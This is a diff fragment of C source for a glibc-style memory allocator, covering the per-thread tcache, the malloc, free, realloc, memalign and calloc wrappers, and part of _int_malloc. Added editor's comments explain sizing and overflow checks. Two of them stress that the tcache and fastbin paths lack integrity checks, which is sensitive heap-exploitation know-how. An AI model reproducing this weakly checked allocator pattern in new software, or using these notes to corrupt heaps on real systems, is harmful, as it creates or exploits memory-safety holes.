+  atomic_add (&mp_.mmapped_mem, -total_size);
+
+  /* If munmap failed the process virtual memory address space is in a
+     bad shape.  Just leave the block hanging around, the process will
+     terminate shortly anyway since not much can be done.  */
+  __munmap ((char *) block, total_size);
+}
+
+#if HAVE_MREMAP
+
+static mchunkptr
+internal_function
+mremap_chunk (mchunkptr p, size_t new_size)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T offset = prev_size (p);
+  INTERNAL_SIZE_T size = chunksize (p);
+  char *cp;
+
+  assert (chunk_is_mmapped (p));
+  assert (((size + offset) & (GLRO (dl_pagesize) - 1)) == 0);
+
+  /* Note the extra SIZE_SZ overhead as in mmap_chunk(). */
+  new_size = ALIGN_UP (new_size + offset + SIZE_SZ, pagesize);
+
+  /* No need to remap if the number of pages does not change.  */
+  if (size + offset == new_size)
+    return p;
+
+  cp = (char *) __mremap ((char *) p - offset, size + offset, new_size,
+                          MREMAP_MAYMOVE);
+
+  if (cp == MAP_FAILED)
+    return 0;
+
+  p = (mchunkptr) (cp + offset);
+
+  assert (aligned_OK (chunk2mem (p)));
+
+  assert (prev_size (p) == offset);
+  set_head (p, (new_size - offset) | IS_MMAPPED);
+
+  INTERNAL_SIZE_T new;
+  new = atomic_exchange_and_add (&mp_.mmapped_mem, new_size - size - offset)
+        + new_size - size - offset;
+  atomic_max (&mp_.max_mmapped_mem, new);
+  return p;
+}
+#endif /* HAVE_MREMAP */
+
+/*------------------------ Public wrappers. --------------------------------*/
+
+#if USE_TCACHE
+
+/* We overlay this structure on the user-data portion of a chunk when
+   the chunk is stored in the per-thread cache.  */
+typedef struct tcache_entry
+{
+  struct tcache_entry *next;
+} tcache_entry;
+
+/* There is one of these for each thread, which contains the
+   per-thread cache (hence "tcache_perthread_struct").  Keeping
+   overall size low is mildly important.  Note that COUNTS and ENTRIES
+   are redundant (we could have just counted the linked list each
+   time); keeping explicit counts is purely a performance optimization.  */
+typedef struct tcache_perthread_struct
+{
+  char counts[TCACHE_MAX_BINS];
+  tcache_entry *entries[TCACHE_MAX_BINS];
+} tcache_perthread_struct;
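+/*
+   Illustrative note (editor's addition): on a typical 64-bit build with
+   MALLOC_ALIGNMENT == 16, csize2tidx maps chunk sizes 32, 48, 64, ... to
+   bins 0, 1, 2, ..., so with the default TCACHE_MAX_BINS of 64 every chunk
+   size up to 0x410 bytes has a tcache bin.  Each bin holds at most
+   mp_.tcache_count entries (7 by default), tracked by the one-byte
+   counters above.
+ */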
+
+static __thread char tcache_shutting_down = 0;
+static __thread tcache_perthread_struct *tcache = NULL;
+
+/* Caller must ensure that we know tc_idx is valid and there's room
+   for more chunks.  */
+static void
+tcache_put (mchunkptr chunk, size_t tc_idx)
+{
+  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
+  assert (tc_idx < TCACHE_MAX_BINS);
+  e->next = tcache->entries[tc_idx];
+  tcache->entries[tc_idx] = e;
+  ++(tcache->counts[tc_idx]);
+}
+
+/* Caller must ensure that we know tc_idx is valid and there are
+   chunks available to remove.  */
+static void *
+tcache_get (size_t tc_idx)
+{
+  tcache_entry *e = tcache->entries[tc_idx];
+  assert (tc_idx < TCACHE_MAX_BINS);
+  assert (tcache->entries[tc_idx] > 0);
+  tcache->entries[tc_idx] = e->next;
+  --(tcache->counts[tc_idx]);
+  return (void *) e;
+}
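+/*
+   Usage sketch (editor's illustration): each bin behaves as a LIFO stack
+   keyed purely by tc_idx, so for two chunks of the same size
+
+     tcache_put (chunk_a, tc_idx);
+     tcache_put (chunk_b, tc_idx);
+     assert (tcache_get (tc_idx) == chunk2mem (chunk_b));
+
+   i.e. the most recently cached chunk is handed back first, with no size
+   or integrity checks beyond the asserts above.
+ */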
+
+static void __attribute__ ((section ("__libc_thread_freeres_fn")))
+tcache_thread_freeres (void)
+{
+  int i;
+  tcache_perthread_struct *tcache_tmp = tcache;
+
+  if (!tcache)
+    return;
+
+  tcache = NULL;
+
+  for (i = 0; i < TCACHE_MAX_BINS; ++i)
+    {
+      while (tcache_tmp->entries[i])
+	{
+	  tcache_entry *e = tcache_tmp->entries[i];
+	  tcache_tmp->entries[i] = e->next;
+	  __libc_free (e);
+	}
+    }
+
+  __libc_free (tcache_tmp);
+
+  tcache_shutting_down = 1;
+}
+text_set_element (__libc_thread_subfreeres, tcache_thread_freeres);
+
+static void
+tcache_init(void)
+{
+  mstate ar_ptr;
+  void *victim = 0;
+  const size_t bytes = sizeof (tcache_perthread_struct);
+
+  if (tcache_shutting_down)
+    return;
+
+  arena_get (ar_ptr, bytes);
+  victim = _int_malloc (ar_ptr, bytes);
+  if (!victim && ar_ptr != NULL)
+    {
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  /* In a low memory situation, we may not be able to allocate memory
+     - in which case, we just keep trying later.  However, we
+     typically do this very early, so either there is sufficient
+     memory, or there isn't enough memory to do non-trivial
+     allocations anyway.  */
+  if (victim)
+    {
+      tcache = (tcache_perthread_struct *) victim;
+      memset (tcache, 0, sizeof (tcache_perthread_struct));
+    }
+
+}
+
+#define MAYBE_INIT_TCACHE() \
+  if (__glibc_unlikely (tcache == NULL)) \
+    tcache_init();
+
+#else
+#define MAYBE_INIT_TCACHE()
+#endif
+
+void *
+__libc_malloc (size_t bytes)
+{
+  mstate ar_ptr;
+  void *victim;
+
+  void *(*hook) (size_t, const void *)
+    = atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(bytes, RETURN_ADDRESS (0));
+#if USE_TCACHE
+  /* int_free also calls request2size, be careful to not pad twice.  */
+  size_t tbytes = request2size (bytes);
+  size_t tc_idx = csize2tidx (tbytes);
+
+  MAYBE_INIT_TCACHE ();
+
+  DIAG_PUSH_NEEDS_COMMENT;
+  if (tc_idx < mp_.tcache_bins
+      /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
+      && tcache
+      && tcache->entries[tc_idx] != NULL)
+    {
+      return tcache_get (tc_idx);
+    }
+  DIAG_POP_NEEDS_COMMENT;
+#endif
+
+  arena_get (ar_ptr, bytes);
+
+  victim = _int_malloc (ar_ptr, bytes);
+  /* Retry with another arena only if we were able to find a usable arena
+     before.  */
+  if (!victim && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_malloc_retry, 1, bytes);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (victim)));
+  return victim;
+}
+libc_hidden_def (__libc_malloc)
+
+void
+__libc_free (void *mem)
+{
+  mstate ar_ptr;
+  mchunkptr p;                          /* chunk corresponding to mem */
+
+  void (*hook) (void *, const void *)
+    = atomic_forced_read (__free_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      (*hook)(mem, RETURN_ADDRESS (0));
+      return;
+    }
+
+  if (mem == 0)                              /* free(0) has no effect */
+    return;
+
+  p = mem2chunk (mem);
+
+  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+    {
+      /* See if the dynamic brk/mmap threshold needs adjusting.
+	 Dumped fake mmapped chunks do not affect the threshold.  */
+      if (!mp_.no_dyn_threshold
+          && chunksize_nomask (p) > mp_.mmap_threshold
+          && chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX
+	  && !DUMPED_MAIN_ARENA_CHUNK (p))
+        {
+          mp_.mmap_threshold = chunksize (p);
+          mp_.trim_threshold = 2 * mp_.mmap_threshold;
+          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+                      mp_.mmap_threshold, mp_.trim_threshold);
+        }
+      munmap_chunk (p);
+      return;
+    }
+
+  MAYBE_INIT_TCACHE ();
+
+  ar_ptr = arena_for_chunk (p);
+  _int_free (ar_ptr, p, 0);
+}
+libc_hidden_def (__libc_free)
+
+void *
+__libc_realloc (void *oldmem, size_t bytes)
+{
+  mstate ar_ptr;
+  INTERNAL_SIZE_T nb;         /* padded request size */
+
+  void *newp;             /* chunk to return */
+
+  void *(*hook) (void *, size_t, const void *) =
+    atomic_forced_read (__realloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(oldmem, bytes, RETURN_ADDRESS (0));
+
+#if REALLOC_ZERO_BYTES_FREES
+  if (bytes == 0 && oldmem != NULL)
+    {
+      __libc_free (oldmem); return 0;
+    }
+#endif
+
+  /* realloc of null is supposed to be same as malloc */
+  if (oldmem == 0)
+    return __libc_malloc (bytes);
+
+  /* chunk corresponding to oldmem */
+  const mchunkptr oldp = mem2chunk (oldmem);
+  /* its size */
+  const INTERNAL_SIZE_T oldsize = chunksize (oldp);
+
+  if (chunk_is_mmapped (oldp))
+    ar_ptr = NULL;
+  else
+    {
+      MAYBE_INIT_TCACHE ();
+      ar_ptr = arena_for_chunk (oldp);
+    }
+
+  /* Little security check which won't hurt performance: the allocator
+     never wraps around at the end of the address space.  Therefore
+     we can exclude some size values which might appear here by
+     accident or by "design" from some intruder.  We need to bypass
+     this check for dumped fake mmap chunks from the old main arena
+     because the new malloc may provide additional alignment.  */
+  if ((__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
+       || __builtin_expect (misaligned_chunk (oldp), 0))
+      && !DUMPED_MAIN_ARENA_CHUNK (oldp))
+    {
+      malloc_printerr (check_action, "realloc(): invalid pointer", oldmem,
+		       ar_ptr);
+      return NULL;
+    }
+
+  checked_request2size (bytes, nb);
+
+  if (chunk_is_mmapped (oldp))
+    {
+      /* If this is a faked mmapped chunk from the dumped main arena,
+	 always make a copy (and do not free the old chunk).  */
+      if (DUMPED_MAIN_ARENA_CHUNK (oldp))
+	{
+	  /* Must alloc, copy, free. */
+	  void *newmem = __libc_malloc (bytes);
+	  if (newmem == 0)
+	    return NULL;
+	  /* Copy as many bytes as are available from the old chunk
+	     and fit into the new size.  NB: The overhead for faked
+	     mmapped chunks is only SIZE_SZ, not 2 * SIZE_SZ as for
+	     regular mmapped chunks.  */
+	  if (bytes > oldsize - SIZE_SZ)
+	    bytes = oldsize - SIZE_SZ;
+	  memcpy (newmem, oldmem, bytes);
+	  return newmem;
+	}
+
+      void *newmem;
+
+#if HAVE_MREMAP
+      newp = mremap_chunk (oldp, nb);
+      if (newp)
+        return chunk2mem (newp);
+#endif
+      /* Note the extra SIZE_SZ overhead. */
+      if (oldsize - SIZE_SZ >= nb)
+        return oldmem;                         /* do nothing */
+
+      /* Must alloc, copy, free. */
+      newmem = __libc_malloc (bytes);
+      if (newmem == 0)
+        return 0;              /* propagate failure */
+
+      memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ);
+      munmap_chunk (oldp);
+      return newmem;
+    }
+
+  __libc_lock_lock (ar_ptr->mutex);
+
+  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+
+  __libc_lock_unlock (ar_ptr->mutex);
+  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+  if (newp == NULL)
+    {
+      /* Try harder to allocate memory in other arenas.  */
+      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
+      newp = __libc_malloc (bytes);
+      if (newp != NULL)
+        {
+          memcpy (newp, oldmem, oldsize - SIZE_SZ);
+          _int_free (ar_ptr, oldp, 0);
+        }
+    }
+
+  return newp;
+}
+libc_hidden_def (__libc_realloc)
+
+void *
+__libc_memalign (size_t alignment, size_t bytes)
+{
+  void *address = RETURN_ADDRESS (0);
+  return _mid_memalign (alignment, bytes, address);
+}
+
+static void *
+_mid_memalign (size_t alignment, size_t bytes, void *address)
+{
+  mstate ar_ptr;
+  void *p;
+
+  void *(*hook) (size_t, size_t, const void *) =
+    atomic_forced_read (__memalign_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(alignment, bytes, address);
+
+  /* If we need less alignment than we give anyway, just relay to malloc.  */
+  if (alignment <= MALLOC_ALIGNMENT)
+    return __libc_malloc (bytes);
+
+  /* Otherwise, ensure that it is at least a minimum chunk size */
+  if (alignment < MINSIZE)
+    alignment = MINSIZE;
+
+  /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a
+     power of 2 and will cause overflow in the check below.  */
+  if (alignment > SIZE_MAX / 2 + 1)
+    {
+      __set_errno (EINVAL);
+      return 0;
+    }
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+
+  /* Make sure alignment is power of 2.  */
+  if (!powerof2 (alignment))
+    {
+      size_t a = MALLOC_ALIGNMENT * 2;
+      while (a < alignment)
+        a <<= 1;
+      alignment = a;
+    }
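+  /* Editor's example: a requested alignment of 48 is not a power of two,
+     so the loop starts at MALLOC_ALIGNMENT * 2 (32 on typical 64-bit
+     builds) and doubles until it reaches 64, the next power of two that
+     still satisfies the original request.  */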
+
+  arena_get (ar_ptr, bytes + alignment + MINSIZE);
+
+  p = _int_memalign (ar_ptr, alignment, bytes);
+  if (!p && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_memalign_retry, 2, bytes, alignment);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      p = _int_memalign (ar_ptr, alignment, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (p)));
+  return p;
+}
+/* For ISO C11.  */
+weak_alias (__libc_memalign, aligned_alloc)
+libc_hidden_def (__libc_memalign)
+
+void *
+__libc_valloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  return _mid_memalign (pagesize, bytes, address);
+}
+
+void *
+__libc_pvalloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  size_t rounded_bytes = ALIGN_UP (bytes, pagesize);
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - 2 * pagesize - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  return _mid_memalign (pagesize, rounded_bytes, address);
+}
+
+void *
+__libc_calloc (size_t n, size_t elem_size)
+{
+  mstate av;
+  mchunkptr oldtop, p;
+  INTERNAL_SIZE_T bytes, sz, csz, oldtopsize;
+  void *mem;
+  unsigned long clearsize;
+  unsigned long nclears;
+  INTERNAL_SIZE_T *d;
+
+  /* size_t is unsigned so the behavior on overflow is defined.  */
+  bytes = n * elem_size;
+#define HALF_INTERNAL_SIZE_T \
+  (((INTERNAL_SIZE_T) 1) << (8 * sizeof (INTERNAL_SIZE_T) / 2))
+  if (__builtin_expect ((n | elem_size) >= HALF_INTERNAL_SIZE_T, 0))
+    {
+      if (elem_size != 0 && bytes / elem_size != n)
+        {
+          __set_errno (ENOMEM);
+          return 0;
+        }
+    }
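+  /* Illustrative note (editor's addition): on 64-bit targets
+     HALF_INTERNAL_SIZE_T is 2^32, so the division only runs when n or
+     elem_size has a bit set in its upper half.  E.g. n == 0x100000000 and
+     elem_size == 0x10 give bytes == 0x1000000000 and bytes / elem_size == n,
+     so the request is accepted, while n == elem_size == 0x100000001 wraps
+     around and fails the check.  */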
+
+  void *(*hook) (size_t, const void *) =
+    atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      sz = bytes;
+      mem = (*hook)(sz, RETURN_ADDRESS (0));
+      if (mem == 0)
+        return 0;
+
+      return memset (mem, 0, sz);
+    }
+
+  sz = bytes;
+
+  MAYBE_INIT_TCACHE ();
+
+  arena_get (av, sz);
+  if (av)
+    {
+      /* Check if we hand out the top chunk, in which case there may be no
+	 need to clear. */
+#if MORECORE_CLEARS
+      oldtop = top (av);
+      oldtopsize = chunksize (top (av));
+# if MORECORE_CLEARS < 2
+      /* Only newly allocated memory is guaranteed to be cleared.  */
+      if (av == &main_arena &&
+	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
+	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
+# endif
+      if (av != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (oldtop);
+	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
+	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
+	}
+#endif
+    }
+  else
+    {
+      /* No usable arenas.  */
+      oldtop = 0;
+      oldtopsize = 0;
+    }
+  mem = _int_malloc (av, sz);
+
+
+  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
+          av == arena_for_chunk (mem2chunk (mem)));
+
+  if (mem == 0 && av != NULL)
+    {
+      LIBC_PROBE (memory_calloc_retry, 1, sz);
+      av = arena_get_retry (av, sz);
+      mem = _int_malloc (av, sz);
+    }
+
+  if (av != NULL)
+    __libc_lock_unlock (av->mutex);
+
+  /* Allocation failed even after a retry.  */
+  if (mem == 0)
+    return 0;
+
+  p = mem2chunk (mem);
+
+  /* Two optional cases in which clearing not necessary */
+  if (chunk_is_mmapped (p))
+    {
+      if (__builtin_expect (perturb_byte, 0))
+        return memset (mem, 0, sz);
+
+      return mem;
+    }
+
+  csz = chunksize (p);
+
+#if MORECORE_CLEARS
+  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
+    {
+      /* clear only the bytes from non-freshly-sbrked memory */
+      csz = oldtopsize;
+    }
+#endif
+
+  /* Unroll clear of <= 36 bytes (72 if 8-byte sizes).  We know that
+     contents have an odd number of INTERNAL_SIZE_T-sized words;
+     minimally 3.  */
+  d = (INTERNAL_SIZE_T *) mem;
+  clearsize = csz - SIZE_SZ;
+  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
+  assert (nclears >= 3);
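+  /* Editor's example (SIZE_SZ == 8): the smallest chunk, csz == 32, gives
+     clearsize == 24 and nclears == 3; the largest unrolled case is csz == 80
+     with nclears == 9, i.e. 72 bytes cleared by the stores below.  Anything
+     larger falls through to memset.  */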
+
+  if (nclears > 9)
+    return memset (d, 0, clearsize);
+
+  else
+    {
+      *(d + 0) = 0;
+      *(d + 1) = 0;
+      *(d + 2) = 0;
+      if (nclears > 4)
+        {
+          *(d + 3) = 0;
+          *(d + 4) = 0;
+          if (nclears > 6)
+            {
+              *(d + 5) = 0;
+              *(d + 6) = 0;
+              if (nclears > 8)
+                {
+                  *(d + 7) = 0;
+                  *(d + 8) = 0;
+                }
+            }
+        }
+    }
+
+  return mem;
+}
+
+/*
+   ------------------------------ malloc ------------------------------
+ */
+
+static void *
+_int_malloc (mstate av, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;               /* normalized request size */
+  unsigned int idx;                 /* associated bin index */
+  mbinptr bin;                      /* associated bin */
+
+  mchunkptr victim;                 /* inspected/selected chunk */
+  INTERNAL_SIZE_T size;             /* its size */
+  int victim_index;                 /* its bin index */
+
+  mchunkptr remainder;              /* remainder from a split */
+  unsigned long remainder_size;     /* its size */
+
+  unsigned int block;               /* bit map traverser */
+  unsigned int bit;                 /* bit map traverser */
+  unsigned int map;                 /* current word of binmap */
+
+  mchunkptr fwd;                    /* misc temp for linking */
+  mchunkptr bck;                    /* misc temp for linking */
+
+#if USE_TCACHE
+  size_t tcache_unsorted_count;	    /* count of unsorted chunks processed */
+#endif
+
+  const char *errstr = NULL;
+
+  /*
+     Convert request size to internal form by adding SIZE_SZ bytes
+     overhead plus possibly more to obtain necessary alignment and/or
+     to obtain a size of at least MINSIZE, the smallest allocatable
+     size. Also, checked_request2size traps (returning 0) request sizes
+     that are so large that they wrap around zero when padded and
+     aligned.
+   */
+
+  checked_request2size (bytes, nb);
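+  /* Illustrative example (typical 64-bit build, SIZE_SZ == 8): a request of
+     24 bytes becomes nb == 32, since the usable area overlaps the next
+     chunk's prev_size field and the sum is rounded up to MALLOC_ALIGNMENT;
+     a request of 25 bytes becomes nb == 48.  */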
+
+  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
+     mmap.  */
+  if (__glibc_unlikely (av == NULL))
+    {
+      void *p = sysmalloc (nb, av);
+      if (p != NULL)
+	alloc_perturb (p, bytes);
+      return p;
+    }
+
+  /*
+     If the size qualifies as a fastbin, first check corresponding bin.
+     This code is safe to execute even if av is not yet initialized, so we
+     can try it without checking, which saves some time on this fast path.
+   */
+
+#define REMOVE_FB(fb, victim, pp)			\
+  do							\
+    {							\
+      victim = pp;					\
+      if (victim == NULL)				\
+	break;						\
+    }							\
+  while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim)) \
+	 != victim);					\
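+  /* Editor's note: REMOVE_FB is a lock-free pop of the fastbin head.  PP
+     holds the value last read from *FB; if another thread changed the bin
+     between that read and the compare-and-exchange, the CAS returns the new
+     head and the loop retries with it.  The fastbin_index check just below
+     is the only validation applied to the chunk handed to the caller.  */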
+
+  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+    {
+      idx = fastbin_index (nb);
+      mfastbinptr *fb = &fastbin (av, idx);
+      mchunkptr pp = *fb;
+      REMOVE_FB (fb, victim, pp);
+      if (victim != 0)
+        {
+          if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, 0))
+            {
+              errstr = "malloc(): memory corruption (fast)";
+            errout:
+              malloc_printerr (check_action, errstr, chunk2mem (victim), av);
+              return NULL;
+            }
+          check_remalloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	  /* While we're here, if we see other chunks of the same size,
+	     stash them in the tcache.  */
+	  size_t tc_idx = csize2tidx (nb);
+	  if (tcache && tc_idx < mp_.tcache_bins)
+	    {
+	      mchunkptr tc_victim;
+
+	      /* While bin not empty and tcache not full, copy chunks over.  */
+	      while (tcache->counts[tc_idx] < mp_.tcache_count
+		     && (pp = *fb) != NULL)
+		{
+		  REMOVE_FB (fb, tc_victim, pp);
+		  if (tc_victim != 0)
+		    {
+		      tcache_put (tc_victim, tc_idx);
+	            }
+		}
+	    }
+#endif
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+
+  /*
+     If a small request, check regular bin.  Since these "smallbins"
+     hold one size each, no searching within bins is necessary.
+     (For a large request, we need to wait until unsorted chunks are
+     processed to find best fit. But for small ones, fits are exact
+     anyway, so we can check now, which is faster.)
+   */
+
+  if (in_smallbin_range (nb))
+    {
+      idx = smallbin_index (nb);
+      bin = bin_at (av, idx);
+
+      if ((victim = last (bin)) != bin)
+        {
+          if (victim == 0) /* initialization check */
+            malloc_consolidate (av);
+          else
+            {
+              bck = victim->bk;
+              if (__glibc_unlikely (bck->fd != victim))
+                {
+                  errstr = "malloc(): smallbin double linked list corrupted";
+                  goto errout;
+                }
+              set_inuse_bit_at_offset (victim, nb);
+              bin->bk = bck;
+              bck->fd = bin;
+
+              if (av != &main_arena)
+		set_non_main_arena (victim);
+              check_malloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	  /* While we're here, if we see other chunks of the same size,
+	     stash them in the tcache.  */
+	  size_t tc_idx = csize2tidx (nb);
+	  if (tcache && tc_idx < mp_.tcache_bins)
+	    {
+	      mchunkptr tc_victim;
+
+	      /* While bin not empty and tcache not full, copy chunks over.  */
+	      while (tcache->counts[tc_idx] < mp_.tcache_count
+		     && (tc_victim = last (bin)) != bin)
+		{
+		  if (tc_victim != 0)
+		    {
+		      bck = tc_victim->bk;
+		      set_inuse_bit_at_offset (tc_victim, nb);
+		      if (av != &main_arena)
+			set_non_main_arena (tc_victim);
+		      bin->bk = bck;
+		      bck->fd = bin;
+
+		      tcache_put (tc_victim, tc_idx);
+	            }
+		}
+	    }
+#endif
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+    }
+
+  /*
+     If this is a large request, consolidate fastbins before continuing.
+     While it might look excessive to kill all fastbins before
+     even seeing if there is space available, this avoids
+     fragmentation problems normally associated with fastbins.
+     Also, in practice, programs tend to have runs of either small or
+     large requests, but less often mixtures, so consolidation is not
+     invoked all that often in most programs. And the programs in which
+     it is called frequently tend to fragment anyway.
+   */
+
+  else
+    {
+      idx = largebin_index (nb);
+      if (have_fastchunks (av))
+        malloc_consolidate (av);
+    }
+
+  /*
+     Process recently freed or remaindered chunks, taking one only if
+     it is exact fit, or, if this a small request, the chunk is remainder from
+     the most recent non-exact fit.  Place other traversed chunks in
+     bins.  Note that this step is the only place in any routine where
+     chunks are placed in bins.
+
+     The outer loop here is needed because we might not realize until
+     near the end of malloc that we should have consolidated, so must
+     do so and retry. This happens at most once, and only when we would
+     otherwise need to expand memory to service a "small" request.
+   */
+
+#if USE_TCACHE
+  INTERNAL_SIZE_T tcache_nb = 0;
+  size_t tc_idx = csize2tidx (nb);
+  if (tcache && tc_idx < mp_.tcache_bins)
+    tcache_nb = nb;
+  int return_cached = 0;
+
+  tcache_unsorted_count = 0;
+#endif
+
+  for (;; )
+    {
+      int iters = 0;
+      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+        {
+          bck = victim->bk;
+          if (__builtin_expect (chunksize_nomask (victim) <= 2 * SIZE_SZ, 0)
+              || __builtin_expect (chunksize_nomask (victim)
+				   > av->system_mem, 0))
+            malloc_printerr (check_action, "malloc(): memory corruption",
+                             chunk2mem (victim), av);
+          size = chunksize (victim);
+
+          /*
+             If a small request, try to use last remainder if it is the
+             only chunk in unsorted bin.  This helps promote locality for
+             runs of consecutive small requests. This is the only
+             exception to best-fit, and applies only when there is
+             no exact fit for a small chunk.
+           */
+
+          if (in_smallbin_range (nb) &&
+              bck == unsorted_chunks (av) &&
+              victim == av->last_remainder &&
+              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+            {
+              /* split and reattach remainder */
+              remainder_size = size - nb;
+              remainder = chunk_at_offset (victim, nb);
+              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+              av->last_remainder = remainder;
+              remainder->bk = remainder->fd = unsorted_chunks (av);
+              if (!in_smallbin_range (remainder_size))
+                {
+                  remainder->fd_nextsize = NULL;
+                  remainder->bk_nextsize = NULL;
+                }
+
+              set_head (victim, nb | PREV_INUSE |
+                        (av != &main_arena ? NON_MAIN_ARENA : 0));
+              set_head (remainder, remainder_size | PREV_INUSE);
+              set_foot (remainder, remainder_size);
+
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* remove from unsorted list */
+          unsorted_chunks (av)->bk = bck;
+          bck->fd = unsorted_chunks (av);
+
+          /* Take now instead of binning if exact fit */
+
+          if (size == nb)
+            {
+              set_inuse_bit_at_offset (victim, size);
+              if (av != &main_arena)
+		set_non_main_arena (victim);
+#if USE_TCACHE
+	      /* Fill cache first, return to user only if cache fills.
+		 We may return one of these chunks later.  */
+	      if (tcache_nb
+		  && tcache->counts[tc_idx] < mp_.tcache_count)
+		{
+		  tcache_put (victim, tc_idx);
+		  return_cached = 1;
+		  continue;
+		}
+	      else
+		{
+#endif
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+#if USE_TCACHE
+		}
+#endif
+            }
+
+          /* place chunk in bin */
+
+          if (in_smallbin_range (size))
+            {
+              victim_index = smallbin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+            }
+          else
+            {
+              victim_index = largebin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+
+              /* maintain large bins in sorted order */
+              if (fwd != bck)
+                {
+                  /* Or with inuse bit to speed comparisons */
+                  size |= PREV_INUSE;
+                  /* if smaller than smallest, bypass loop below */
+                  assert (chunk_main_arena (bck->bk));
+                  if ((unsigned long) (size)
+		      < (unsigned long) chunksize_nomask (bck->bk))
+                    {
+                      fwd = bck;
+                      bck = bck->bk;
+
+                      victim->fd_nextsize = fwd->fd;
+                      victim->bk_nextsize = fwd->fd->bk_nextsize;
+                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+                    }
+                  else
+                    {
+                      assert (chunk_main_arena (fwd));
+                      while ((unsigned long) size < chunksize_nomask (fwd))
+                        {
+                          fwd = fwd->fd_nextsize;
+			  assert (chunk_main_arena (fwd));
+                        }
+
+                      if ((unsigned long) size
+			  == (unsigned long) chunksize_nomask (fwd))
+                        /* Always insert in the second position.  */
+                        fwd = fwd->fd;
+                      else
+                        {
+                          victim->fd_nextsize = fwd;
+                          victim->bk_nextsize = fwd->bk_nextsize;
+                          fwd->bk_nextsize = victim;
+                          victim->bk_nextsize->fd_nextsize = victim;
+                        }
+                      bck = fwd->bk;
+                    }
+                }
+              else
+                victim->fd_nextsize = victim->bk_nextsize = victim;
+            }
+
+          mark_bin (av, victim_index);
+          victim->bk = bck;
+          victim->fd = fwd;
+          fwd->bk = victim;
+          bck->fd = victim;
+
+#if USE_TCACHE
+      /* If we've processed as many chunks as we're allowed while
+	 filling the cache, return one of the cached ones.  */
+      ++tcache_unsorted_count;
+      if (return_cached
+	  && mp_.tcache_unsorted_limit > 0
+	  && tcache_unsorted_count > mp_.tcache_unsorted_limit)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+#define MAX_ITERS       10000
+          if (++iters >= MAX_ITERS)
+            break;
+        }
+
+#if USE_TCACHE
+      /* If all the small chunks we found ended up cached, return one now.  */
+      if (return_cached)
+	{
